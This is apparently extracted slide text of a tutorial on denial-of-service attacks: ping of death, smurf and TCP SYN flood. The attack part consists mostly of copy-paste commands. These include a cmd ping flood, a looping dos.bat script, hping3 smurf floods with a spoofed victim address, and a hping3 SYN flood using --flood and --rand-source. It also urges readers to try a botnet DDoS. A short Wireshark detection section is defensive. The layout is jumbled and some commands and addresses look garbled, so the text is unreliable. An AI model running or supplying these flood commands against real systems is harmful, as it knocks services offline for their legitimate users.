What is a Denial of

Service Attack? How

to DoS Attack
 ● DoS is an attack used to deny legitimate users access to a resource
What is such as accessing a website, network, emails, etc. or making it
extremely slow.
Denial of ● DoS is the acronym for Denial of Service.
Service ● This type of attack is usually implemented by hitting the target
resource such as a web server with too many requests at the same
Attack time.
(DoS)? ● This results in the server failing to respond to all the requests.
● The effect of this can either be crashing the servers or slowing them
down.
 ● Cutting off some business from the internet can lead to significant
loss of business or money.
Cons. ● The internet and computer networks power a lot of businesses.
Some organizations such as payment gateways, e-commerce sites
entirely depend on the internet to do business.
 DoS Distributed DoS

Types of
Denial of ● – this type of attack is
performed by a number of
Service (DoS) ● this type of attack is compromised machines that
Attacks performed by a single host all target the same victim. It
floods the network with data
packets.
Ping of Death
Well, that’s the negative side of the ping packet. When we increase the
size of the ping packet unnaturally, forming a malformed ping packet to
attack a computer system, this type of attack is called a “ping of death”
attack.
 ● The ping command is usually used to test the availability of a
network resource. It works by sending small data packets to the
network resource. The ping of death takes advantage of this and
sends data packets above the maximum limit (65,536 bytes) that
TCP/IP allows.
Ping of Death
● If we look at the primary level, then a ping packet is generally size
56 bytes or 84 bytes (including IP header as well). However, a ping
packet can also be made as large as up to 65,536 bytes.

● TCP/IP fragmentation breaks the packets into small chunks that are
sent to the server. Since the sent data packages are larger than what
the server can handle, the server can freeze, reboot, or crash.
● A ping packet can also be malformed to perform a denial of service
attack by sending continuous ping packets to the target IP
address. A constant ping will cause buffer overflow at the target
system and will cause the target system to crash.
 ● Disclaimer: This article was purely written for educational
purposes.
● Open the command prompt.
To Do DDoS
● Copy the following command and paste it in cmd.
(Ping Of ● ping <IP Address> -t |65500
Death Attack) ● Replace the “<IP Address>” with the target’s IP Address.
Using CMD ● By using “-t” you’re specifying that the system shouldn’t stop
pinging until it’s manually stopped by you, the user.
● “65500” is the data load.
 Open the Notepad app.
Copy and paste the following commands.

:loop
ping <IP Address> -l 65500 -w 1 -n 1
Using goto :loop
In the above command, replace <IP Address> with an IP address.
Notepad.
Save the Notepad with any name. Let’s say dos.txt
Right click on the dos.txt and click on rename.
Change the extension from .txt to .bat
So, now the file name should be dos.bat
Double click on it and you will see a command prompt running with a lot
of pings.
Smurf
sudo apt-get install hping3
 ● This type of attack uses large amounts of Internet Control Message
Protocol (ICMP) ping traffic target at an Internet Broadcast
Address.
● The reply IP address is spoofed to that of the intended victim.
● All the replies are sent to the victim instead of the IP used for the
Detail pings.
● Since a single Internet Broadcast Address can support a maximum
of 255 hosts, a smurf attack amplifies a single ping 255 times.
● The effect of this is slowing down the network to a point where it is
impossible to use it.
Smurf attacks using
hping3

hping3 is a network tool used to send and receive packets to and from a host
or network. It is similar to the ping command but offers more advanced features,
including the ability to send different types of packets and customize various
packet parameters.
 ● Here, the attacker spoofs the IP address of the victim 1.1.1.2 and
sends a broadcast message to 1.1.1.255.

Play the game ● all other victim macines 1.1.1.3, 1.1.1.4, 1.1.1.5, 1.1.1.6 recives the
message, and responce back to 1.1.1.2 (Spoofed ip of victim) instad
of 1.1.1.1 (Attacker). this creates a DDOS situation for the server
● Smurf attacks occur when a spoofed source address sends a large
amount of ICMP packets to the broadcast address. Hosts on that
network will then respond back, as they are support to respond back
to broadcast addresses. This causes a denial-of-service situation on
the local LAN.
● Typically, you would want your network devices to not send a
directed broadcast through the interface, so the packet is dropped
and nothing bad occurs.
● But, if that infrastructure-based configuration is not set, the smurf
attack will be successful.
 ● hping3-1 --flood -a 192.168.33.123 192.168.1.255

● -1 --icmp: default
● --flood: It send packets as more...

Let’s break ● -a 192.168.33.123: This option sets the source IP address for the
packets being sent. Here, the source IP is set to 192.168.33.123.
down
● 192.168.1.255: This specifies the target IP address or network. In
this case, the target is 192.168.1.255, which is the broadcast address
for the subnet 192.168.1.0/24. Sending packets to the broadcast
address means they will be sent
Step 1: In kali type command $nmap 196.168.176.129 (Target’s IP address i.e. Ubuntu)
Step 2: $nmap -sP 196.168.176.129 (Run a fast scan on the target system, but bypass host discovery.)
Step 3: $nmap -Pn -sP 196.168.176.129 (The nmap utility can be used to detect the operating system of a
particular target)
Step 4: $ping 196.168.176.129
Step 5: (In Ubuntu System) $sudo tcpdump -i ens33
Step 6:(In Kali) $hping3 –icmp -c 1 spoof 196.168.176.129 196.168.176.255.
The source ip is changing every time for sending the syn packet to the target machine. By this the target will
never get to know from which actual ip the packet is coming thus making the attacker anonymous over the
internet.
Flooding the target computer with data packets doesn’t have much effect on the victim. In order for the attack
to be more effective, one should attack the target computer with pings from more than one computer. This
attack can be used to attacker routers, web servers etc.
How To Perform TCP
SYN Flood DoS Attack &
Detect It With Wireshark
- Kali Linux Hping3
DoS attacks are simple to carry out, can cause serious downtime, and aren’t
always obvious. In a SYN flood attack, a malicious party exploits the TCP
protocol 3-way handshake to quickly cause service and network disruptions,
ultimately leading to an Denial of Service (DoS) Attack.
How TCP
SYN Flood
Attacks Work
● When a client attempts to connect to a server using the TCP
protocol e.g (HTTP or HTTPS), it is first required to perform
a three-way handshake before any data is exchanged between the
two. Since the three-way TCP handshake is always initiated by
the client it sends a SYN packet to the server.

● The server next replies acknowledging the request and at the same
time sends its own SYN request – this is the SYN-ACK packet.
The finally the client sends an ACK packet which confirms both
two hosts agree to create a connection. The connection is therefore
established and data can be transferred between them.
● In a SYN flood, the attacker sends a high volume of SYN
packets to the server using spoofed IP addresses causing the
server to send a reply (SYN-ACK) and leave its ports half-open,
awaiting for a reply from a host that doesn’t exist:
 ● In a simpler, direct attack (without IP spoofing), the attacker will
simply use firewall rules to discard SYN-ACK packets before they
reach him.
● By flooding a target with SYN packets and not
responding (ACK), an attacker can easily overwhelm the target’s
CPU memory resources.
consumption ● In this state, the target struggles to handle traffic which in turn
will increase CPU usage and memory consumption ultimately
leading to the exhaustion of its resources (CPU and RAM).
● At this point the server will no longer be able to serve legitimate
client requests and ultimately lead to a Denial-of-Service.
How To Perform A TCP
SYN Flood Attack With
Kali Linux & Hping3
● # sudo apt-get install hping3
●
n most cases, attackers will use hping or another tool to spoof IP random
addresses, so that’s what we’re going to focus on. The line below lets us start
and direct the SYN flood attack to our target (192.168.1.159):
● # hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.159
●
We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each.
● We’re specifying that the SYN Flag (-S) should be enabled, with a TCP
window size of 64 (-w 64).
● To direct the attack to our victum’s HTTP web server we specify port 80 (-p
80) and
● use the --flood flag to send packets as fast as possible.
● As you’d expect, the --rand-source flag generates spoofed IP addresses to
disguise the real source and avoid detection but at the same time stop the
victim’s SYN-ACK reply packets from reaching the attacker.
 ● Straight away, though, admins should be able to note the start of the
attack by a huge flood of TCP traffic. We can filter for SYN
packets without an acknowledgment using the following
filter: tcp.flags.syn == 1 and tcp.flags.ack == 0
How To
Detect A SYN ● We can also view Wireshark’s graphs for a visual
representation of the uptick in traffic. The I/O graph can be found
Flood Attack via the Statistics>I/O Graph menu. It shows a massive spike in
With overall packets from near 0 to up to 2400 packets a second.

Wireshark
● By removing our filter and opening the protocol hierarchy
statistics, we can also see that there has been an unusually high
volume of TCP packets:
●
Try to create
DDOS attack
with bot
https://gbhackers.com/kali-linux-tutorial-dos-attack/#google_vig
nette
https://www.tutorialsfreak.com/ethical-hacking-tutorial/dos-prac
tical
https://www.firewall.cx/tools-tips-reviews/network-protocol-ana
lyzers/performing-tcp-syn-flood-attack-and-detecting-it-with-wi
reshark.html
https://www.wallarm.com/what/smurf-ddos-attack
https://www.geeksforgeeks.org/program-to-find-class-broadcast-
and-network-addresses/

https://techofide.com/blogs/what-is-smurf-attack-what-is-the-d
enial-of-service-attack-practical-ddos-attack-step-by-step-guide
/